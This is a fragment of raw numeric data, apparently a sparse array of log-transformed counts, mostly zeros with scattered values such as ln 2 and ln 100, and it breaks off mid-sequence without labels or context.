0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.791759469228055, 0.0, 1.6094379124341003, 0.0, \n 1.791759469228055, 4.06534854782536, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 4.06534854782536, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0,\n 4.605170185988092, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 5.480638923341991, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 1.0986122886681098, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.2188758248682006, 0.0, 0.0, 0.0,\n 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 3.713572066704308, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.9318256327243257, 0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 5.2574953720277815, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.7369991058576035, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 2.9957322735539913,\n 0, 0.0, 0.0, 0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 9.656627474604601, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 7.3792124757492905, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.8066624897703196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 1.7412592803704001, 0.0, 0, 3.4825185607408002, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.6109179126442243, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 3.6375861597263857, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 1.7412592803704001, 0.0, 2.4849066497880004, 0.0, 1.791759469228055,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 2.0794415416798357, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.666426688112432,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 2.70805020110221, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.8918202981106265, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 